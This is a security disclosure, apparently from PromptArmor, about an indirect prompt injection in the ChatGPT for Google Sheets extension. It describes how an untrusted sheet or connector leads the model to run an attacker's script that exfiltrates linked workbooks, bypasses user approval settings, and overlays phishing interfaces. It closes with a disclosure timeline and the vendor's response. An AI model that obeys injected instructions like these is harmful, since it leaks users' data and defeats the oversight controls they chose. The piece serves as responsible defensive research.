ChatGPT for Google Sheets exfiltrated workbooks

Threat Intelligence

ChatGPT for Google Sheets exfiltrates workbooks

ChatGPT for Google Sheets is vulnerable to data exfiltration and overlay phishing attacks that affect workbooks in the victim's account after an indirect prompt injection into a single sheet.

This attack does not require human approval, even when in the settings the user has explicitly required human approval before ChatGPT modifies workbooks.

UPDATE from OpenAI:

"We appreciate the security research here, and it is unfortunate that it escaped a flaw in our disclosure pipeline. As we are now aware of this report, we have taken immediate steps to protect users from potential attacks in this area by removing the model's ability to generate Apps Script code, which should eliminate the risk to users of ChatGPT for Google Sheets. We are taking a close look at how this feature interacts with Google Sheets API and re-evaluation of our sandboxing approach to ensure this product is as resilient as possible to rapid injection attacks More broadly, we will re-examine similar functionality on other surfaces to ensure our defenses are consistent and effective across the board.

Recently, OpenAI launched an AI extension to use ChatGPT in Google Sheets, which has accumulated over 185,000 downloads since its launch less than a month ago. This allows users to operate on their spreadsheets by interacting with an AI chatbot that sits in a sidebar, with the added benefit of drawing on data from ChatGPT connectors.

A single indirect injection attack triggered by a single benign user request can trigger all of the following effects at once:

Exfiltration of numerous binders from the victim's account

Displaying an interactive phishing pop-up

Overwriting the entire GPT sidebar by an attacker-controlled chatbot interface

Attacker-controlled changes to your workbooks

This attack occurs when an untrusted data source (for example, from an imported sheet or a ChatGPT connector) manipulates ChatGPT to execute an external script controlled by an attacker, which executes by exploiting the permissions the user has granted to the ChatGPT extension for Google Sheets.

This vulnerability has been responsibly disclosed to OpenAI. Despite multiple follow-ups, we have received no communication other than an automated response to our initial disclosure. OpenAI's documentation does not describe sensitive capabilities granted to the model (e.g., executing privileged scripts) or the risks of manipulating the model via indirect prompt injection, instead focusing only on functional limitations and data management issues. As such, we publish our results to enable informed decision-making regarding the risk surface.

Note: ChatGPT for Google Sheets has a setting called "Apply changes automatically" that determines when human approvals are required before an agent action completes. However, this attack succeeds even when the user has explicitly disabled automatic changes.

Below, the attacker's server logs show the user's exfiltrated financial model.

Here, the internal financial model sheet included a link to another spreadsheet relevant to budgeting. The malicious script identifies the spreadsheet URL in the stolen data and exfiltrates the newly discovered workbook. It then continues to process the stolen data, identifying and exfiltrating additional workbooks, ultimately exfiltrating 12 in total.

Note: Clicking the “Stop” button in the ChatGPT sidebar does not stop the execution of started scripts.

In addition to the data exfiltration described above, the same attacker-controlled scripts allow a malicious actor to target two variations of an overlapping phishing attack.

Variation 1: A sidebar opens and overlays the ChatGPT extension for Google Sheets with an attacker-controlled site, allowing the attacker to impersonate the extension. The malicious sidebar can run scripts that modify the sheet in a similar way to ChatGPT, allowing it to act in many of the extension's usual ways, while also performing malicious activities such as:

Collect all user prompts

Providing the user with a misaligned chatbot to interact with

Convince user to “reconnect” connectors to access additional applications

Displaying a phishing UI to steal credentials for OpenAI

Variant 2: A pop-up modal opens and displays a website controlled by an attacker to phish the user for their credentials.

Organizations can leverage the following configuration to control access to ChatGPT for Google Sheets:

Workspace Settings > Permissions & Roles > ChatGPT for Excel and Google Sheets

UPDATE: OpenAI has responded; details are at the top of the article.

This vulnerability has been responsibly disclosed to OpenAI. Despite multiple follow-ups, we have received no communication other than an automated response to our initial disclosure. OpenAI's documentation does not describe sensitive capabilities granted to the model (e.g., executing privileged scripts) or the risks of manipulating the model via indirect prompt injection, instead focusing only on functional limitations and data management issues. As such, we publish our results to enable informed decision-making regarding the risk surface.

May 08, 2026 PromptArmor discloses to OpenAI via email

May 8, 2026 OpenAI sends an automated response, confirming the intended reporting channel

May 08, 2026 PromptArmor confirms email preference

May 12, 2026 PromptArmor follows up

May 18, 2026 PromptArmor follows up

May 27, 2026 Public disclosure

UPDATE:

May 31, 2026 OpenAI responds; more details at the top.